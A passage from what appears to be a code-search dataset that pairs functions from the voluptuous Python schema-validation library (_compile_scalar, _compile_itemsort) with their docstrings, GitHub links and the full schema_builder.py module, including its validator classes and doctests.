return schema(data)
except (Invalid, MultipleInvalid) as e:
raise Error(humanize_error(data, e, max_sub_error_length))
|
alecthomas/voluptuous | voluptuous/schema_builder.py | _compile_scalar | python | def _compile_scalar(schema):
if inspect.isclass(schema):
def validate_instance(path, data):
if isinstance(data, schema):
return data
else:
msg = 'expected %s' % schema.__name__
raise er.TypeInvalid(msg, path)
return validate_instance
if callable(schema):
def validate_callable(path, data):
try:
return schema(data)
except ValueError as e:
raise er.ValueInvalid('not a valid value', path)
except er.Invalid as e:
e.prepend(path)
raise
return validate_callable
def validate_value(path, data):
if data != schema:
raise er.ScalarInvalid('not a valid value', path)
return data
return validate_value | A scalar value.
The schema can either be a value or a type.
>>> _compile_scalar(int)([], 1)
1
>>> with raises(er.Invalid, 'expected float'):
... _compile_scalar(float)([], '1')
Callables have
>>> _compile_scalar(lambda v: float(v))([], '1')
1.0
As a convenience, ValueError's are trapped:
>>> with raises(er.Invalid, 'not a valid value'):
... _compile_scalar(lambda v: float(v))([], 'a') | train | https://github.com/alecthomas/voluptuous/blob/36c8c11e2b7eb402c24866fa558473661ede9403/voluptuous/schema_builder.py#L785-L831 | null | import collections
import inspect
import re
from functools import wraps
import sys
from contextlib import contextmanager
import itertools
from voluptuous import error as er
if sys.version_info >= (3,):
long = int
unicode = str
basestring = str
ifilter = filter
def iteritems(d):
return d.items()
else:
from itertools import ifilter
def iteritems(d):
return d.iteritems()
if sys.version_info >= (3, 3):
_Mapping = collections.abc.Mapping
else:
_Mapping = collections.Mapping
"""Schema validation for Python data structures.
Given eg. a nested data structure like this:
{
'exclude': ['Users', 'Uptime'],
'include': [],
'set': {
'snmp_community': 'public',
'snmp_timeout': 15,
'snmp_version': '2c',
},
'targets': {
'localhost': {
'exclude': ['Uptime'],
'features': {
'Uptime': {
'retries': 3,
},
'Users': {
'snmp_community': 'monkey',
'snmp_port': 15,
},
},
'include': ['Users'],
'set': {
'snmp_community': 'monkeys',
},
},
},
}
A schema like this:
>>> settings = {
... 'snmp_community': str,
... 'retries': int,
... 'snmp_version': All(Coerce(str), Any('3', '2c', '1')),
... }
>>> features = ['Ping', 'Uptime', 'Http']
>>> schema = Schema({
... 'exclude': features,
... 'include': features,
... 'set': settings,
... 'targets': {
... 'exclude': features,
... 'include': features,
... 'features': {
... str: settings,
... },
... },
... })
Validate like so:
>>> schema({
... 'set': {
... 'snmp_community': 'public',
... 'snmp_version': '2c',
... },
... 'targets': {
... 'exclude': ['Ping'],
... 'features': {
... 'Uptime': {'retries': 3},
... 'Users': {'snmp_community': 'monkey'},
... },
... },
... }) == {
... 'set': {'snmp_version': '2c', 'snmp_community': 'public'},
... 'targets': {
... 'exclude': ['Ping'],
... 'features': {'Uptime': {'retries': 3},
... 'Users': {'snmp_community': 'monkey'}}}}
True
"""
# options for extra keys
PREVENT_EXTRA = 0 # any extra key not in schema will raise an error
ALLOW_EXTRA = 1 # extra keys not in schema will be included in output
REMOVE_EXTRA = 2 # extra keys not in schema will be excluded from output
def _isnamedtuple(obj):
return isinstance(obj, tuple) and hasattr(obj, '_fields')
primitive_types = (str, unicode, bool, int, float)
class Undefined(object):
def __nonzero__(self):
return False
def __repr__(self):
return '...'
UNDEFINED = Undefined()
def Self():
raise er.SchemaError('"Self" should never be called')
def default_factory(value):
if value is UNDEFINED or callable(value):
return value
return lambda: value
@contextmanager
def raises(exc, msg=None, regex=None):
try:
yield
except exc as e:
if msg is not None:
assert str(e) == msg, '%r != %r' % (str(e), msg)
if regex is not None:
assert re.search(regex, str(e)), '%r does not match %r' % (str(e), regex)
def Extra(_):
"""Allow keys in the data that are not present in the schema."""
raise er.SchemaError('"Extra" should never be called')
# As extra() is never called there's no way to catch references to the
# deprecated object, so we just leave an alias here instead.
extra = Extra
class Schema(object):
"""A validation schema.
The schema is a Python tree-like structure where nodes are pattern
matched against corresponding trees of values.
Nodes can be values, in which case a direct comparison is used, types,
in which case an isinstance() check is performed, or callables, which will
validate and optionally convert the value.
We can equate schemas also.
For Example:
>>> v = Schema({Required('a'): unicode})
>>> v1 = Schema({Required('a'): unicode})
>>> v2 = Schema({Required('b'): unicode})
>>> assert v == v1
>>> assert v != v2
"""
_extra_to_name = {
REMOVE_EXTRA: 'REMOVE_EXTRA',
ALLOW_EXTRA: 'ALLOW_EXTRA',
PREVENT_EXTRA: 'PREVENT_EXTRA',
}
def __init__(self, schema, required=False, extra=PREVENT_EXTRA):
"""Create a new Schema.
:param schema: Validation schema. See :module:`voluptuous` for details.
:param required: Keys defined in the schema must be in the data.
:param extra: Specify how extra keys in the data are treated:
- :const:`~voluptuous.PREVENT_EXTRA`: to disallow any undefined
extra keys (raise ``Invalid``).
- :const:`~voluptuous.ALLOW_EXTRA`: to include undefined extra
keys in the output.
- :const:`~voluptuous.REMOVE_EXTRA`: to exclude undefined extra keys
from the output.
- Any value other than the above defaults to
:const:`~voluptuous.PREVENT_EXTRA`
"""
self.schema = schema
self.required = required
self.extra = int(extra) # ensure the value is an integer
self._compiled = self._compile(schema)
@classmethod
def infer(cls, data, **kwargs):
"""Create a Schema from concrete data (e.g. an API response).
For example, this will take a dict like:
{
'foo': 1,
'bar': {
'a': True,
'b': False
},
'baz': ['purple', 'monkey', 'dishwasher']
}
And return a Schema:
{
'foo': int,
'bar': {
'a': bool,
'b': bool
},
'baz': [str]
}
Note: only very basic inference is supported.
"""
def value_to_schema_type(value):
if isinstance(value, dict):
if len(value) == 0:
return dict
return {k: value_to_schema_type(v)
for k, v in iteritems(value)}
if isinstance(value, list):
if len(value) == 0:
return list
else:
return [value_to_schema_type(v)
for v in value]
return type(value)
return cls(value_to_schema_type(data), **kwargs)
def __eq__(self, other):
if not isinstance(other, Schema):
return False
return other.schema == self.schema
def __ne__(self, other):
return not (self == other)
def __str__(self):
return str(self.schema)
def __repr__(self):
return "<Schema(%s, extra=%s, required=%s) object at 0x%x>" % (
self.schema, self._extra_to_name.get(self.extra, '??'),
self.required, id(self))
def __call__(self, data):
"""Validate data against this schema."""
try:
return self._compiled([], data)
except er.MultipleInvalid:
raise
except er.Invalid as e:
raise er.MultipleInvalid([e])
# return self.validate([], self.schema, data)
def _compile(self, schema):
if schema is Extra:
return lambda _, v: v
if schema is Self:
return lambda p, v: self._compiled(p, v)
elif hasattr(schema, "__voluptuous_compile__"):
return schema.__voluptuous_compile__(self)
if isinstance(schema, Object):
return self._compile_object(schema)
if isinstance(schema, _Mapping):
return self._compile_dict(schema)
elif isinstance(schema, list):
return self._compile_list(schema)
elif isinstance(schema, tuple):
return self._compile_tuple(schema)
elif isinstance(schema, (frozenset, set)):
return self._compile_set(schema)
type_ = type(schema)
if inspect.isclass(schema):
type_ = schema
if type_ in (bool, bytes, int, long, str, unicode, float, complex, object,
list, dict, type(None)) or callable(schema):
return _compile_scalar(schema)
raise er.SchemaError('unsupported schema data type %r' %
type(schema).__name__)
def _compile_mapping(self, schema, invalid_msg=None):
"""Create validator for given mapping."""
invalid_msg = invalid_msg or 'mapping value'
# Keys that may be required
all_required_keys = set(key for key in schema
if key is not Extra and
((self.required and not isinstance(key, (Optional, Remove))) or
isinstance(key, Required)))
# Keys that may have defaults
all_default_keys = set(key for key in schema
if isinstance(key, Required) or
isinstance(key, Optional))
_compiled_schema = {}
for skey, svalue in iteritems(schema):
new_key = self._compile(skey)
new_value = self._compile(svalue)
_compiled_schema[skey] = (new_key, new_value)
candidates = list(_iterate_mapping_candidates(_compiled_schema))
# After we have the list of candidates in the correct order, we want to apply some optimization so that each
# key in the data being validated will be matched against the relevant schema keys only.
# No point in matching against different keys
additional_candidates = []
candidates_by_key = {}
for skey, (ckey, cvalue) in candidates:
if type(skey) in primitive_types:
candidates_by_key.setdefault(skey, []).append((skey, (ckey, cvalue)))
elif isinstance(skey, Marker) and type(skey.schema) in primitive_types:
candidates_by_key.setdefault(skey.schema, []).append((skey, (ckey, cvalue)))
else:
# These are wildcards such as 'int', 'str', 'Remove' and others which should be applied to all keys
additional_candidates.append((skey, (ckey, cvalue)))
def validate_mapping(path, iterable, out):
required_keys = all_required_keys.copy()
# Build a map of all provided key-value pairs.
# The type(out) is used to retain ordering in case a ordered
# map type is provided as input.
key_value_map = type(out)()
for key, value in iterable:
key_value_map[key] = value
# Insert default values for non-existing keys.
for key in all_default_keys:
if not isinstance(key.default, Undefined) and \
key.schema not in key_value_map:
# A default value has been specified for this missing
# key, insert it.
key_value_map[key.schema] = key.default()
error = None
errors = []
for key, value in key_value_map.items():
key_path = path + [key]
remove_key = False
# Optimization. Validate against the matching key first, then fallback to the rest
relevant_candidates = itertools.chain(candidates_by_key.get(key, []), additional_candidates)
# compare each given key/value against all compiled key/values
# schema key, (compiled key, compiled value)
for skey, (ckey, cvalue) in relevant_candidates:
try:
new_key = ckey(key_path, key)
except er.Invalid as e:
if len(e.path) > len(key_path):
raise
if not error or len(e.path) > len(error.path):
error = e
continue
# Backtracking is not performed once a key is selected, so if
# the value is invalid we immediately throw an exception.
exception_errors = []
# check if the key is marked for removal
is_remove = new_key is Remove
try:
cval = cvalue(key_path, value)
# include if it's not marked for removal
if not is_remove:
out[new_key] = cval
else:
remove_key = True
continue
except er.MultipleInvalid as e:
exception_errors.extend(e.errors)
except er.Invalid as e:
exception_errors.append(e)
if exception_errors:
if is_remove or remove_key:
continue
for err in exception_errors:
if len(err.path) <= len(key_path):
err.error_type = invalid_msg
errors.append(err)
# If there is a validation error for a required
# key, this means that the key was provided.
# Discard the required key so it does not
# create an additional, noisy exception.
required_keys.discard(skey)
break
# Key and value okay, mark as found in case it was
# a Required() field.
required_keys.discard(skey)
break
else:
if remove_key:
# remove key
continue
elif self.extra == ALLOW_EXTRA:
out[key] = value
elif self.extra != REMOVE_EXTRA:
errors.append(er.Invalid('extra keys not allowed', key_path))
# else REMOVE_EXTRA: ignore the key so it's removed from output
# for any required keys left that weren't found and don't have defaults:
for key in required_keys:
msg = key.msg if hasattr(key, 'msg') and key.msg else 'required key not provided'
errors.append(er.RequiredFieldInvalid(msg, path + [key]))
if errors:
raise er.MultipleInvalid(errors)
return out
return validate_mapping
def _compile_object(self, schema):
"""Validate an object.
Has the same behavior as dictionary validator but work with object
attributes.
For example:
>>> class Structure(object):
... def __init__(self, one=None, three=None):
... self.one = one
... self.three = three
...
>>> validate = Schema(Object({'one': 'two', 'three': 'four'}, cls=Structure))
>>> with raises(er.MultipleInvalid, "not a valid value for object value @ data['one']"):
... validate(Structure(one='three'))
"""
base_validate = self._compile_mapping(
schema, invalid_msg='object value')
def validate_object(path, data):
if schema.cls is not UNDEFINED and not isinstance(data, schema.cls):
raise er.ObjectInvalid('expected a {0!r}'.format(schema.cls), path)
iterable = _iterate_object(data)
iterable = ifilter(lambda item: item[1] is not None, iterable)
out = base_validate(path, iterable, {})
return type(data)(**out)
return validate_object
def _compile_dict(self, schema):
"""Validate a dictionary.
A dictionary schema can contain a set of values, or at most one
validator function/type.
A dictionary schema will only validate a dictionary:
>>> validate = Schema({})
>>> with raises(er.MultipleInvalid, 'expected a dictionary'):
... validate([])
An invalid dictionary value:
>>> validate = Schema({'one': 'two', 'three': 'four'})
>>> with raises(er.MultipleInvalid, "not a valid value for dictionary value @ data['one']"):
... validate({'one': 'three'})
An invalid key:
>>> with raises(er.MultipleInvalid, "extra keys not allowed @ data['two']"):
... validate({'two': 'three'})
Validation function, in this case the "int" type:
>>> validate = Schema({'one': 'two', 'three': 'four', int: str})
Valid integer input:
>>> validate({10: 'twenty'})
{10: 'twenty'}
By default, a "type" in the schema (in this case "int") will be used
purely to validate that the corresponding value is of that type. It
will not Coerce the value:
>>> with raises(er.MultipleInvalid, "extra keys not allowed @ data['10']"):
... validate({'10': 'twenty'})
Wrap them in the Coerce() function to achieve this:
>>> from voluptuous import Coerce
>>> validate = Schema({'one': 'two', 'three': 'four',
... Coerce(int): str})
>>> validate({'10': 'twenty'})
{10: 'twenty'}
Custom message for required key
>>> validate = Schema({Required('one', 'required'): 'two'})
>>> with raises(er.MultipleInvalid, "required @ data['one']"):
... validate({})
(This is to avoid unexpected surprises.)
Multiple errors for nested field in a dict:
>>> validate = Schema({
... 'adict': {
... 'strfield': str,
... 'intfield': int
... }
... })
>>> try:
... validate({
... 'adict': {
... 'strfield': 123,
... 'intfield': 'one'
... }
... })
... except er.MultipleInvalid as e:
... print(sorted(str(i) for i in e.errors)) # doctest: +NORMALIZE_WHITESPACE
["expected int for dictionary value @ data['adict']['intfield']",
"expected str for dictionary value @ data['adict']['strfield']"]
"""
base_validate = self._compile_mapping(
schema, invalid_msg='dictionary value')
groups_of_exclusion = {}
groups_of_inclusion = {}
for node in schema:
if isinstance(node, Exclusive):
g = groups_of_exclusion.setdefault(node.group_of_exclusion, [])
g.append(node)
elif isinstance(node, Inclusive):
g = groups_of_inclusion.setdefault(node.group_of_inclusion, [])
g.append(node)
def validate_dict(path, data):
if not isinstance(data, dict):
raise er.DictInvalid('expected a dictionary', path)
errors = []
for label, group in groups_of_exclusion.items():
exists = False
for exclusive in group:
if exclusive.schema in data:
if exists:
msg = exclusive.msg if hasattr(exclusive, 'msg') and exclusive.msg else \
"two or more values in the same group of exclusion '%s'" % label
next_path = path + [VirtualPathComponent(label)]
errors.append(er.ExclusiveInvalid(msg, next_path))
break
exists = True
if errors:
raise er.MultipleInvalid(errors)
for label, group in groups_of_inclusion.items():
included = [node.schema in data for node in group]
if any(included) and not all(included):
msg = "some but not all values in the same group of inclusion '%s'" % label
for g in group:
if hasattr(g, 'msg') and g.msg:
msg = g.msg
break
next_path = path + [VirtualPathComponent(label)]
errors.append(er.InclusiveInvalid(msg, next_path))
break
if errors:
raise er.MultipleInvalid(errors)
out = data.__class__()
return base_validate(path, iteritems(data), out)
return validate_dict
def _compile_sequence(self, schema, seq_type):
"""Validate a sequence type.
This is a sequence of valid values or validators tried in order.
>>> validator = Schema(['one', 'two', int])
>>> validator(['one'])
['one']
>>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
... validator([3.5])
>>> validator([1])
[1]
"""
_compiled = [self._compile(s) for s in schema]
seq_type_name = seq_type.__name__
def validate_sequence(path, data):
if not isinstance(data, seq_type):
raise er.SequenceTypeInvalid('expected a %s' % seq_type_name, path)
# Empty seq schema, allow any data.
if not schema:
if data:
raise er.MultipleInvalid([
er.ValueInvalid('not a valid value', [value]) for value in data
])
return data
out = []
invalid = None
errors = []
index_path = UNDEFINED
for i, value in enumerate(data):
index_path = path + [i]
invalid = None
for validate in _compiled:
try:
cval = validate(index_path, value)
if cval is not Remove: # do not include Remove values
out.append(cval)
break
except er.Invalid as e:
if len(e.path) > len(index_path):
raise
invalid = e
else:
errors.append(invalid)
if errors:
raise er.MultipleInvalid(errors)
if _isnamedtuple(data):
return type(data)(*out)
else:
return type(data)(out)
return validate_sequence
def _compile_tuple(self, schema):
"""Validate a tuple.
A tuple is a sequence of valid values or validators tried in order.
>>> validator = Schema(('one', 'two', int))
>>> validator(('one',))
('one',)
>>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
... validator((3.5,))
>>> validator((1,))
(1,)
"""
return self._compile_sequence(schema, tuple)
def _compile_list(self, schema):
"""Validate a list.
A list is a sequence of valid values or validators tried in order.
>>> validator = Schema(['one', 'two', int])
>>> validator(['one'])
['one']
>>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
... validator([3.5])
>>> validator([1])
[1]
"""
return self._compile_sequence(schema, list)
def _compile_set(self, schema):
"""Validate a set.
A set is an unordered collection of unique elements.
>>> validator = Schema({int})
>>> validator(set([42])) == set([42])
True
>>> with raises(er.Invalid, 'expected a set'):
... validator(42)
>>> with raises(er.MultipleInvalid, 'invalid value in set'):
... validator(set(['a']))
"""
type_ = type(schema)
type_name = type_.__name__
def validate_set(path, data):
if not isinstance(data, type_):
raise er.Invalid('expected a %s' % type_name, path)
_compiled = [self._compile(s) for s in schema]
errors = []
for value in data:
for validate in _compiled:
try:
validate(path, value)
break
except er.Invalid:
pass
else:
invalid = er.Invalid('invalid value in %s' % type_name, path)
errors.append(invalid)
if errors:
raise er.MultipleInvalid(errors)
return data
return validate_set
def extend(self, schema, required=None, extra=None):
"""Create a new `Schema` by merging this and the provided `schema`.
Neither this `Schema` nor the provided `schema` are modified. The
resulting `Schema` inherits the `required` and `extra` parameters of
this, unless overridden.
Both schemas must be dictionary-based.
:param schema: dictionary to extend this `Schema` with
:param required: if set, overrides `required` of this `Schema`
:param extra: if set, overrides `extra` of this `Schema`
"""
assert type(self.schema) == dict and type(schema) == dict, 'Both schemas must be dictionary-based'
result = self.schema.copy()
# returns the key that may have been passed as arugment to Marker constructor
def key_literal(key):
return (key.schema if isinstance(key, Marker) else key)
# build a map that takes the key literals to the needed objects
# literal -> Required|Optional|literal
result_key_map = dict((key_literal(key), key) for key in result)
# for each item in the extension schema, replace duplicates
# or add new keys
for key, value in iteritems(schema):
# if the key is already in the dictionary, we need to replace it
# transform key to literal before checking presence
if key_literal(key) in result_key_map:
result_key = result_key_map[key_literal(key)]
result_value = result[result_key]
# if both are dictionaries, we need to extend recursively
# create the new extended sub schema, then remove the old key and add the new one
if type(result_value) == dict and type(value) == dict:
new_value = Schema(result_value).extend(value).schema
del result[result_key]
result[key] = new_value
# one or the other or both are not sub-schemas, simple replacement is fine
# remove old key and add new one
else:
del result[result_key]
result[key] = value
# key is new and can simply be added
else:
result[key] = value
# recompile and send old object
result_cls = type(self)
result_required = (required if required is not None else self.required)
result_extra = (extra if extra is not None else self.extra)
return result_cls(result, required=result_required, extra=result_extra)
def _compile_itemsort():
'''return sort function of mappings'''
def is_extra(key_):
return key_ is Extra
def is_remove(key_):
return isinstance(key_, Remove)
def is_marker(key_):
return isinstance(key_, Marker)
def is_type(key_):
return inspect.isclass(key_)
def is_callable(key_):
return callable(key_)
# priority list for map sorting (in order of checking)
# We want Extra to match last, because it's a catch-all. On the other hand,
# Remove markers should match first (since invalid values will not
# raise an Error, instead the validator will check if other schemas match
# the same value).
priority = [(1, is_remove), # Remove highest priority after values
(2, is_marker), # then other Markers
(4, is_type), # types/classes lowest before Extra
(3, is_callable), # callables after markers
(5, is_extra)] # Extra lowest priority
def item_priority(item_):
key_ = item_[0]
for i, check_ in priority:
if check_(key_):
return i
# values have hightest priorities
return 0
return item_priority
_sort_item = _compile_itemsort()
def _iterate_mapping_candidates(schema):
"""Iterate over schema in a meaningful order."""
# Without this, Extra might appear first in the iterator, and fail to
# validate a key even though it's a Required that has its own validation,
# generating a false positive.
return sorted(iteritems(schema), key=_sort_item)
def _iterate_object(obj):
"""Return iterator over object attributes. Respect objects with
defined __slots__.
"""
d = {}
try:
d = vars(obj)
except TypeError:
# maybe we have named tuple here?
if hasattr(obj, '_asdict'):
d = obj._asdict()
for item in iteritems(d):
yield item
try:
slots = obj.__slots__
except AttributeError:
pass
else:
for key in slots:
if key != '__dict__':
yield (key, getattr(obj, key))
class Msg(object):
"""Report a user-friendly message if a schema fails to validate.
>>> validate = Schema(
... Msg(['one', 'two', int],
... 'should be one of "one", "two" or an integer'))
>>> with raises(er.MultipleInvalid, 'should be one of "one", "two" or an integer'):
... validate(['three'])
Messages are only applied to invalid direct descendants of the schema:
>>> validate = Schema(Msg([['one', 'two', int]], 'not okay!'))
>>> with raises(er.MultipleInvalid, 'expected int @ data[0][0]'):
... validate([['three']])
The type which is thrown can be overridden but needs to be a subclass of Invalid
>>> with raises(er.SchemaError, 'Msg can only use subclases of Invalid as custom class'):
... validate = Schema(Msg([int], 'should be int', cls=KeyError))
If you do use a subclass of Invalid, that error will be thrown (wrapped in a MultipleInvalid)
>>> validate = Schema(Msg([['one', 'two', int]], 'not okay!', cls=er.RangeInvalid))
>>> try:
... validate(['three'])
... except er.MultipleInvalid as e:
... assert isinstance(e.errors[0], er.RangeInvalid)
"""
def __init__(self, schema, msg, cls=None):
if cls and not issubclass(cls, er.Invalid):
raise er.SchemaError("Msg can only use subclases of"
" Invalid as custom class")
self._schema = schema
self.schema = Schema(schema)
self.msg = msg
self.cls = cls
def __call__(self, v):
try:
return self.schema(v)
except er.Invalid as e:
if len(e.path) > 1:
raise e
else:
raise (self.cls or er.Invalid)(self.msg)
def __repr__(self):
return 'Msg(%s, %s, cls=%s)' % (self._schema, self.msg, self.cls)
class Object(dict):
"""Indicate that we should work with attributes, not keys."""
def __init__(self, schema, cls=UNDEFINED):
self.cls = cls
super(Object, self).__init__(schema)
class VirtualPathComponent(str):
def __str__(self):
return '<' + self + '>'
def __repr__(self):
return self.__str__()
# Markers.py
class Marker(object):
"""Mark nodes for special treatment."""
def __init__(self, schema_, msg=None, description=None):
self.schema = schema_
self._schema = Schema(schema_)
self.msg = msg
self.description = description
def __call__(self, v):
try:
return self._schema(v)
except er.Invalid as e:
if not self.msg or len(e.path) > 1:
raise
raise er.Invalid(self.msg)
def __str__(self):
return str(self.schema)
def __repr__(self):
return repr(self.schema)
def __lt__(self, other):
if isinstance(other, Marker):
return self.schema < other.schema
return self.schema < other
def __hash__(self):
return hash(self.schema)
def __eq__(self, other):
return self.schema == other
def __ne__(self, other):
return not(self.schema == other)
class Optional(Marker):
"""Mark a node in the schema as optional, and optionally provide a default
>>> schema = Schema({Optional('key'): str})
>>> schema({})
{}
>>> schema = Schema({Optional('key', default='value'): str})
>>> schema({})
{'key': 'value'}
>>> schema = Schema({Optional('key', default=list): list})
>>> schema({})
{'key': []}
If 'required' flag is set for an entire schema, optional keys aren't required
>>> schema = Schema({
... Optional('key'): str,
... 'key2': str
... }, required=True)
>>> schema({'key2':'value'})
{'key2': 'value'}
"""
def __init__(self, schema, msg=None, default=UNDEFINED, description=None):
super(Optional, self).__init__(schema, msg=msg,
description=description)
self.default = default_factory(default)
class Exclusive(Optional):
"""Mark a node in the schema as exclusive.
Exclusive keys inherited from Optional:
>>> schema = Schema({Exclusive('alpha', 'angles'): int, Exclusive('beta', 'angles'): int})
>>> schema({'alpha': 30})
{'alpha': 30}
Keys inside a same group of exclusion cannot be together, it only makes sense for dictionaries:
>>> with raises(er.MultipleInvalid, "two or more values in the same group of exclusion 'angles' @ data[<angles>]"):
... schema({'alpha': 30, 'beta': 45})
For example, API can provides multiple types of authentication, but only one works in the same time:
>>> msg = 'Please, use only one type of authentication at the same time.'
>>> schema = Schema({
... Exclusive('classic', 'auth', msg=msg):{
... Required('email'): basestring,
... Required('password'): basestring
... },
... Exclusive('internal', 'auth', msg=msg):{
... Required('secret_key'): basestring
... },
... Exclusive('social', 'auth', msg=msg):{
... Required('social_network'): basestring,
... Required('token'): basestring
... }
... })
>>> with raises(er.MultipleInvalid, "Please, use only one type of authentication at the same time. @ data[<auth>]"):
... schema({'classic': {'email': 'foo@example.com', 'password': 'bar'},
... 'social': {'social_network': 'barfoo', 'token': 'tEMp'}})
"""
def __init__(self, schema, group_of_exclusion, msg=None, description=None):
super(Exclusive, self).__init__(schema, msg=msg,
description=description)
self.group_of_exclusion = group_of_exclusion
class Inclusive(Optional):
""" Mark a node in the schema as inclusive.
Inclusive keys inherited from Optional:
>>> schema = Schema({
... Inclusive('filename', 'file'): str,
... Inclusive('mimetype', 'file'): str
... })
>>> data = {'filename': 'dog.jpg', 'mimetype': 'image/jpeg'}
>>> data == schema(data)
True
Keys inside a same group of inclusive must exist together, it only makes sense for dictionaries:
>>> with raises(er.MultipleInvalid, "some but not all values in the same group of inclusion 'file' @ data[<file>]"):
... schema({'filename': 'dog.jpg'})
If none of the keys in the group are present, it is accepted:
>>> schema({})
{}
For example, API can return 'height' and 'width' together, but not separately.
>>> msg = "Height and width must exist together"
>>> schema = Schema({
... Inclusive('height', 'size', msg=msg): int,
... Inclusive('width', 'size', msg=msg): int
... })
>>> with raises(er.MultipleInvalid, msg + " @ data[<size>]"):
... schema({'height': 100})
>>> with raises(er.MultipleInvalid, msg + " @ data[<size>]"):
... schema({'width': 100})
>>> data = {'height': 100, 'width': 100}
>>> data == schema(data)
True
"""
def __init__(self, schema, group_of_inclusion,
msg=None, description=None, default=UNDEFINED):
super(Inclusive, self).__init__(schema, msg=msg,
default=default,
description=description)
self.group_of_inclusion = group_of_inclusion
class Required(Marker):
"""Mark a node in the schema as being required, and optionally provide a default value.
>>> schema = Schema({Required('key'): str})
>>> with raises(er.MultipleInvalid, "required key not provided @ data['key']"):
... schema({})
>>> schema = Schema({Required('key', default='value'): str})
>>> schema({})
{'key': 'value'}
>>> schema = Schema({Required('key', default=list): list})
>>> schema({})
{'key': []}
"""
def __init__(self, schema, msg=None, default=UNDEFINED, description=None):
super(Required, self).__init__(schema, msg=msg,
description=description)
self.default = default_factory(default)
class Remove(Marker):
"""Mark a node in the schema to be removed and excluded from the validated
output. Keys that fail validation will not raise ``Invalid``. Instead, these
keys will be treated as extras.
>>> schema = Schema({str: int, Remove(int): str})
>>> with raises(er.MultipleInvalid, "extra keys not allowed @ data[1]"):
... schema({'keep': 1, 1: 1.0})
>>> schema({1: 'red', 'red': 1, 2: 'green'})
{'red': 1}
>>> schema = Schema([int, Remove(float), Extra])
>>> schema([1, 2, 3, 4.0, 5, 6.0, '7'])
[1, 2, 3, 5, '7']
"""
def __call__(self, v):
super(Remove, self).__call__(v)
return self.__class__
def __repr__(self):
return "Remove(%r)" % (self.schema,)
def __hash__(self):
return object.__hash__(self)
def message(default=None, cls=None):
"""Convenience decorator to allow functions to provide a message.
Set a default message:
>>> @message('not an integer')
... def isint(v):
... return int(v)
>>> validate = Schema(isint())
>>> with raises(er.MultipleInvalid, 'not an integer'):
... validate('a')
The message can be overridden on a per validator basis:
>>> validate = Schema(isint('bad'))
>>> with raises(er.MultipleInvalid, 'bad'):
... validate('a')
The class thrown too:
>>> class IntegerInvalid(er.Invalid): pass
>>> validate = Schema(isint('bad', clsoverride=IntegerInvalid))
>>> try:
... validate('a')
... except er.MultipleInvalid as e:
... assert isinstance(e.errors[0], IntegerInvalid)
"""
if cls and not issubclass(cls, er.Invalid):
raise er.SchemaError("message can only use subclases of Invalid as custom class")
def decorator(f):
@wraps(f)
def check(msg=None, clsoverride=None):
@wraps(f)
def wrapper(*args, **kwargs):
try:
return f(*args, **kwargs)
except ValueError:
raise (clsoverride or cls or er.ValueInvalid)(msg or default or 'invalid value')
return wrapper
return check
return decorator
def _args_to_dict(func, args):
"""Returns argument names as values as key-value pairs."""
if sys.version_info >= (3, 0):
arg_count = func.__code__.co_argcount
arg_names = func.__code__.co_varnames[:arg_count]
else:
arg_count = func.func_code.co_argcount
arg_names = func.func_code.co_varnames[:arg_count]
arg_value_list = list(args)
arguments = dict((arg_name, arg_value_list[i])
for i, arg_name in enumerate(arg_names)
if i < len(arg_value_list))
return arguments
def _merge_args_with_kwargs(args_dict, kwargs_dict):
"""Merge args with kwargs."""
ret = args_dict.copy()
ret.update(kwargs_dict)
return ret
def validate(*a, **kw):
"""Decorator for validating arguments of a function against a given schema.
Set restrictions for arguments:
>>> @validate(arg1=int, arg2=int)
... def foo(arg1, arg2):
... return arg1 * arg2
Set restriction for returned value:
>>> @validate(arg=int, __return__=int)
... def bar(arg1):
... return arg1 * 2
"""
RETURNS_KEY = '__return__'
def validate_schema_decorator(func):
returns_defined = False
returns = None
schema_args_dict = _args_to_dict(func, a)
schema_arguments = _merge_args_with_kwargs(schema_args_dict, kw)
if RETURNS_KEY in schema_arguments:
returns_defined = True
returns = schema_arguments[RETURNS_KEY]
del schema_arguments[RETURNS_KEY]
input_schema = (Schema(schema_arguments, extra=ALLOW_EXTRA)
if len(schema_arguments) != 0 else lambda x: x)
output_schema = Schema(returns) if returns_defined else lambda x: x
@wraps(func)
def func_wrapper(*args, **kwargs):
args_dict = _args_to_dict(func, args)
arguments = _merge_args_with_kwargs(args_dict, kwargs)
validated_arguments = input_schema(arguments)
output = func(**validated_arguments)
return output_schema(output)
return func_wrapper
return validate_schema_decorator
|
alecthomas/voluptuous | voluptuous/schema_builder.py | _compile_itemsort | python | def _compile_itemsort():
'''return sort function of mappings'''
def is_extra(key_):
return key_ is Extra
def is_remove(key_):
return isinstance(key_, Remove)
def is_marker(key_):
return isinstance(key_, Marker)
def is_type(key_):
return inspect.isclass(key_)
def is_callable(key_):
return callable(key_)
# priority list for map sorting (in order of checking)
# We want Extra to match last, because it's a catch-all. On the other hand,
# Remove markers should match first (since invalid values will not
# raise an Error, instead the validator will check if other schemas match
# the same value).
priority = [(1, is_remove), # Remove highest priority after values
(2, is_marker), # then other Markers
(4, is_type), # types/classes lowest before Extra
(3, is_callable), # callables after markers
(5, is_extra)] # Extra lowest priority
def item_priority(item_):
key_ = item_[0]
for i, check_ in priority:
if check_(key_):
return i
# values have hightest priorities
return 0
return item_priority | return sort function of mappings | train | https://github.com/alecthomas/voluptuous/blob/36c8c11e2b7eb402c24866fa558473661ede9403/voluptuous/schema_builder.py#L834-L871 | null | import collections
import inspect
import re
from functools import wraps
import sys
from contextlib import contextmanager
import itertools
from voluptuous import error as er
if sys.version_info >= (3,):
long = int
unicode = str
basestring = str
ifilter = filter
def iteritems(d):
return d.items()
else:
from itertools import ifilter
def iteritems(d):
return d.iteritems()
if sys.version_info >= (3, 3):
_Mapping = collections.abc.Mapping
else:
_Mapping = collections.Mapping
"""Schema validation for Python data structures.
Given eg. a nested data structure like this:
{
'exclude': ['Users', 'Uptime'],
'include': [],
'set': {
'snmp_community': 'public',
'snmp_timeout': 15,
'snmp_version': '2c',
},
'targets': {
'localhost': {
'exclude': ['Uptime'],
'features': {
'Uptime': {
'retries': 3,
},
'Users': {
'snmp_community': 'monkey',
'snmp_port': 15,
},
},
'include': ['Users'],
'set': {
'snmp_community': 'monkeys',
},
},
},
}
A schema like this:
>>> settings = {
... 'snmp_community': str,
... 'retries': int,
... 'snmp_version': All(Coerce(str), Any('3', '2c', '1')),
... }
>>> features = ['Ping', 'Uptime', 'Http']
>>> schema = Schema({
